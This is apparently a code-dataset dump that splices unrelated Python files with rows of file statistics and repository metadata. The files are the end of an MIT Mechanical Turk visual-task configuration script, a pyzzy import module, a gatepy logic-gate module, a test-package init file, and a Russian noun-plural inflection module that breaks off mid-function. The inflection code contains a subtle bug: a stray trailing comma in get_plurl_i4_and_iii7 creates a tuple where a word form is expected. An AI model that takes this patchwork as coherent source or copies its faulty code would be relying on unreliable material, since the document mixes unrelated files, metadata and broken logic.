"stimulus_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_5946318bc2cdd1947534ae15d43aa7a0d820506e_ty-0.64759_tz0.33642_rxy-5.6836_rxz-71.4586_ryz62.4466_s1.169.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_c50790daa826f1d3fbed5580820c6c91fdded273_ty-0.57074_tz0.84081_rxy-157.3224_rxz64.5421_ryz167.7568_s0.86084.png"]
}
GAME = {'gameId':'example_MechanicalTurk_MTS_to_SR',
"periodicRewardIntervalMsec":0,
"periodicRewardAmount":0,
"onFinish":"loop",
"minimumTrials":30,
"maximumTrials":30,
}
TASK_SEQUENCE = [{
"taskType":"MTS",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"choiceMap":{"stimulus_objectome_flute":"token_objectome_flute",
"stimulus_objectome_pineapple":"token_objectome_pineapple",
'stimulus_objectome_dog':"token_objectome_dog"},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
},
{
"taskType":"SR",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"rewardMap":{"stimulus_objectome_flute":[0, 1],
"stimulus_objectome_pineapple":[1, 0]},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
}]
GAME_PACKAGE = {'IMAGEBAGS':IMAGEBAGS, 'GAME':GAME, 'TASK_SEQUENCE':TASK_SEQUENCE}
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'monetary',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'mechanicalturk',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
"instructionsDialogueString":"<ul><p><text style=\"font-weight:bold; font-size:large\">Thank you for your interest and contributing to research at at MIT!</text><pi><li>Please use the latest version of <b>Google Chrome</b> to work on this HIT. It may not work correctly on other browsers.<p><li>You will be presented with rapidly flashed images. <b>Your task is to figure out where to click on parts of the screen based on the information in the images.</b><p><li>The sound of a bell means you did something right, and received a small bonus reward.<p><li>Each trial begins with a <b>WHITE DOT</b>. Click the dot to begin the trial.<p><li>The HIT will submit <b>AUTOMATICALLY</b> after a certain number of trials. If the HIT freezes or does not submit, please contact us to resolve the issue and receive compensation for your time.<p><text style=\"color:#7A7A7A; font-size:smaller; font-style:italic\">If you cannot meet these requirements or if doing so could cause discomfort or injury, do not accept this HIT. You will not be penalized in any way.</text></ul>"
}
sessionPackage = {'GAME_PACKAGE':GAME_PACKAGE, 'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(sessionPackage, agentId = None, landingPageName = 'landingPage_MechanicalTurkMTS_to_SR.html', saveDirectoryPath = SAVE_LOCATION)
return
if __name__ == '__main__':
makeInLabMTS()
makeInLabSR()
makeMechanicalTurkSR()
makeMechanicalTurkMTS()
makeMechanicalTurkSwitcher()
| 69.550162 | 1,100 | 0.645805 | 2,108 | 21,491 | 6.408444 | 0.160342 | 0.004441 | 0.033163 | 0.039381 | 0.932563 | 0.905248 | 0.875638 | 0.866459 | 0.866459 | 0.866459 | 0 | 0.094995 | 0.244195 | 21,491 | 308 | 1,101 | 69.775974 | 0.736687 | 0 | 0 | 0.783394 | 0 | 0.119134 | 0.617933 | 0.158345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018051 | false | 0 | 0.00361 | 0 | 0.039711 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f12f767f550641b05a22aaea31071f03d5e787ba | 426 | py | Python | pyzzy/data/__init__.py | krakozaure/pyzzy | 17a316c0ced8095b671186c73fb5bf1daa2c140b | [
"MIT"
] | null | null | null | pyzzy/data/__init__.py | krakozaure/pyzzy | 17a316c0ced8095b671186c73fb5bf1daa2c140b | [
"MIT"
] | null | null | null | pyzzy/data/__init__.py | krakozaure/pyzzy | 17a316c0ced8095b671186c73fb5bf1daa2c140b | [
"MIT"
] | null | null | null | from .core import (
dump,
dump_conf,
dump_json,
dump_raw,
dump_toml,
dump_yaml,
load,
load_conf,
load_json,
load_raw,
load_toml,
load_yaml,
)
__all__ = [
"dump",
"dump_conf",
"dump_json",
"dump_raw",
"dump_toml",
"dump_yaml",
"load",
"load_conf",
"load_json",
"load_raw",
"load_toml",
"load_yaml",
]
| 14.2 | 20 | 0.5 | 48 | 426 | 3.9375 | 0.229167 | 0.084656 | 0.126984 | 0.169312 | 0.910053 | 0.910053 | 0.910053 | 0.910053 | 0.910053 | 0.910053 | 0 | 0 | 0.373239 | 426 | 29 | 21 | 14.689655 | 0.707865 | 0 | 0 | 0 | 0 | 0 | 0.241814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f18ceb08a875558e4c8881fb4603a1f56f700d7c | 1,565 | py | Python | gatepy/__init__.py | MrNereof/gatepy | a854e560d3f8f112f124174287227e84b8732682 | [
"MIT"
] | 1 | 2021-02-14T09:18:02.000Z | 2021-02-14T09:18:02.000Z | gatepy/__init__.py | MrNereof/gatepy | a854e560d3f8f112f124174287227e84b8732682 | [
"MIT"
] | null | null | null | gatepy/__init__.py | MrNereof/gatepy | a854e560d3f8f112f124174287227e84b8732682 | [
"MIT"
] | null | null | null | def NOT(a: bool) -> bool:
"""NOT logical gate
Args:
a (bool): First input signal
Returns:
bool: Output signal
"""
return not a
def OR(a: bool, b: bool) -> bool:
"""OR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return a or b
def AND(a: bool, b: bool) -> bool:
"""AND logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return a and b
def NAND(a: bool, b: bool) -> bool:
"""NAND logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return NOT(AND(a, b))
def NOR(a: bool, b: bool) -> bool:
"""NOR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return NOT(OR(a, b))
def XOR(a: bool, b: bool) -> bool:
"""XOR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return OR(AND(NOT(a), b), AND(a, NOT(b)))
def XNOR(a: bool, b: bool) -> bool:
"""XNOR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return NOT(XOR(a, b))
| 17.58427 | 45 | 0.510543 | 204 | 1,565 | 3.916667 | 0.102941 | 0.08761 | 0.131414 | 0.140175 | 0.857322 | 0.75219 | 0.75219 | 0.75219 | 0.667084 | 0.667084 | 0 | 0 | 0.371885 | 1,565 | 88 | 46 | 17.784091 | 0.812818 | 0.53738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
74ea0b07024aae3fcdf4e61903ff85724db30d63 | 190 | py | Python | integration_tests/test-packages/python/pythonspecific/pythonspecific/mod_one/__init__.py | franklinen/doppel-cli | 959041ceec578b63fa507b0d71e2ce9e752fb5b7 | [
"BSD-3-Clause"
] | 5 | 2019-03-11T12:44:59.000Z | 2021-02-01T08:10:41.000Z | integration_tests/test-packages/python/pythonspecific/pythonspecific/mod_one/__init__.py | franklinen/doppel-cli | 959041ceec578b63fa507b0d71e2ce9e752fb5b7 | [
"BSD-3-Clause"
] | 174 | 2019-01-20T03:08:44.000Z | 2021-11-03T04:25:56.000Z | integration_tests/test-packages/python/pythonspecific/pythonspecific/mod_one/__init__.py | franklinen/doppel-cli | 959041ceec578b63fa507b0d71e2ce9e752fb5b7 | [
"BSD-3-Clause"
] | 17 | 2019-04-16T18:23:53.000Z | 2021-10-01T15:01:40.000Z | # flake8: noqa
from .some_function import some_function
from .SomeClass import SomeClass
from .SomeClass import SOME_CONSTANT
from .wrap_min import wrap_min
from .wrap_min import MinWrapper
| 27.142857 | 40 | 0.842105 | 28 | 190 | 5.5 | 0.392857 | 0.136364 | 0.246753 | 0.220779 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005988 | 0.121053 | 190 | 6 | 41 | 31.666667 | 0.916168 | 0.063158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
74f8cb4faaf63d14aa94645463d71fd24dc407b7 | 25,639 | py | Python | BS/tmpl_nouns_plurl.py | Aleksey-Voko/Word_forms_bases | f14173cef830e7a514dfaefba3bbbf0c02a3ac0f | [
"MIT"
] | null | null | null | BS/tmpl_nouns_plurl.py | Aleksey-Voko/Word_forms_bases | f14173cef830e7a514dfaefba3bbbf0c02a3ac0f | [
"MIT"
] | null | null | null | BS/tmpl_nouns_plurl.py | Aleksey-Voko/Word_forms_bases | f14173cef830e7a514dfaefba3bbbf0c02a3ac0f | [
"MIT"
] | null | null | null | # Существительные множественное число
from BS.word_form import WordForm
def get_plurl_word_forms(src_dict, singl_word_forms) -> list:
plurls = {
'I1': get_plurl_i1,
'I1*': get_plurl_i1_prim,
'I1&IV11': get_plurl_i1_and_iv11,
'I10': get_plurl_i10,
'I11': get_plurl_i11,
'I13е**': get_plurl_i13e2_prim,
'I13о': get_plurl_i13o,
'I16': get_plurl_i16,
'I16*': get_plurl_i16_prim,
'I16#е': get_plurl_i16sharp_e,
'I16#е*': get_plurl_i16sharp_e_prim,
'I16е': get_plurl_i16e,
'I16е*': get_plurl_i16e_prim,
'I16е*-': get_plurl_i16e_prim__,
'I16о': get_plurl_i16o,
'I16о*': get_plurl_i16o_prim,
'I17#е': get_plurl_i17sharp_e,
'I19': get_plurl_i19,
'I2': get_plurl_i2,
'I2*': get_plurl_i2_prim,
'I3': get_plurl_i3,
'I3*': get_plurl_i3_prim,
'I4': get_plurl_i4,
'I4*': get_plurl_i4_prim,
'I4+III7': get_plurl_i4_and_iii7,
'I6': get_plurl_i6,
'II1': get_plurl_ii1,
'II1*': get_plurl_ii1_prim,
'II1*+6*': get_plurl_ii1_prim_and_6_prim,
'II1+IV1': get_plurl_ii1_and_iv1,
'II3': get_plurl_ii3,
'II6': get_plurl_ii6,
'II6*': get_plurl_ii6_prim,
'III12': get_plurl_iii12,
'III2*': get_plurl_iii2_prim,
'III7': get_plurl_iii7,
'III7*': get_plurl_iii7_prim,
'IV1': get_plurl_iv1,
'IV1+I1': get_plurl_iv1_and_i1,
'IV12': get_plurl_iv12,
'IV13': get_plurl_iv13,
'IV6': get_plurl_iv6,
'IV6*': get_plurl_iv6_prim,
'IV6*+I13*': get_plurl_iv6_prim_and_i13,
'IV6*+II5*': get_plurl_iv6_prim_and_ii5_prim,
'IV6+I13': get_plurl_iv6_and_i13,
'V2': get_plurl_v2,
}
return plurls[src_dict['Inf_6']](src_dict['name'], src_dict['Inf_0'], singl_word_forms)
# I1
def get_plurl_i1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ов'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I1*
def get_plurl_i1_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ов'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ов', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I1&IV11
def get_plurl_i1_and_iv11(name: str, _, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ1'),
WordForm(f'{name[:-2]}ята', '.СмнИ2'),
WordForm(f'{ser[:-1]}ов', '.СмнР1'),
WordForm(f'{name[:-2]}ят', '.СмнР2'),
WordForm(f'{ser[:-1]}ам', '.СмнД1'),
WordForm(f'{name[:-2]}ятам', '.СмнД2'),
WordForm(f'{ser[:-1]}ов', '.СмнВ1'),
WordForm(f'{name[:-2]}ят', '.СмнВ2'),
WordForm(f'{ser[:-1]}ами', '.СмнТ1'),
WordForm(f'{name[:-2]}ятами', '.СмнТ2'),
WordForm(f'{ser[:-1]}ах', '.СмнП1'),
WordForm(f'{name[:-2]}ятах', '.СмнП2'),
]
return word_forms
# I10
def get_plurl_i10(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-2]}ий'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}ий', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I11
def get_plurl_i11(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}й'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}й', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I13е**
def get_plurl_i13e2_prim(_, __, singl_word_forms: list) -> list:
ser2 = list(filter(lambda x: x.idf == '.СеР2', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser2[:-1]}и', '.СмнИ'),
WordForm(f'{ser2[:-2]}е{ser2[-2]}', '.СмнР'),
WordForm(f'{ser2[:-1]}ам', '.СмнД'),
WordForm(f'{ser2[:-1]}и', '.СмнВ'),
WordForm(f'{ser2[:-1]}ами', '.СмнТ'),
WordForm(f'{ser2[:-1]}ах', '.СмнП'),
]
return word_forms
# I13о
def get_plurl_i13o(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-2]}о{ser[-2]}'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-2]}о{ser[-2]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16
def get_plurl_i16(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16*
def get_plurl_i16_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16#е
def get_plurl_i16sharp_e(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-3]}е{ser[-2:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-3]}е{ser[-2:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16#е*
def get_plurl_i16sharp_e_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-3]}е{name[-2:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-3]}е{name[-2:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16е
def get_plurl_i16e(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-2]}е{ser[-2]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}е{ser[-2]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16е*
def get_plurl_i16e_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-2]}е{name[-2]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-2]}е{name[-2]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16е*-
def get_plurl_i16e_prim__(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-2]}е{name[-2]}', '.СмнР'),
WordForm(f'{name}', '.СмнВ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16о
def get_plurl_i16o(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-2]}о{ser[-2]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}о{ser[-2]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16о*
def get_plurl_i16o_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-2]}о{name[-2]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-2]}о{name[-2]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I17#е
def get_plurl_i17sharp_e(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-3]}е{ser[-2:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(f'{ser}', '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I19
def get_plurl_i19(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}ь'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}ь', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I2
def get_plurl_i2(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ев'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ев', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I2*
def get_plurl_i2_prim(name: str, inf_0: str, __) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ев'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ев', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# I3
def get_plurl_i3(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ей'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I3*
def get_plurl_i3_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ей'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I4
def get_plurl_i4(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ей'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I4*
def get_plurl_i4_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ей'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# I4+III7
def get_plurl_i4_and_iii7(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv1 = WordForm(f'{ser[:-1]}и', '.СмнВ1')
smnv2 = WordForm(f'{ser}', '.СмнВ2')
smnv = ''
else:
smnv1 = ''
smnv2 = ''
smnv = WordForm(f'{ser[:-1]}и', '.СмнВ'),
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ1'),
WordForm(f'{ser}', '.СмнИ2'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
smnv1,
smnv2,
smnv,
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return list(filter(None, word_forms))
# I6
def get_plurl_i6(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}ей'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# II1
def get_plurl_ii1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}ы'
else:
smnv = f'{ser[:-1]}ов'
word_forms = [
WordForm(f'{ser[:-1]}ы', '.СмнИ'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# II1*
def get_plurl_ii1_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ов'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ов', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# II1*+6*
def get_plurl_ii1_prim_and_6_prim(name: str, _, __) -> list:
word_forms = [
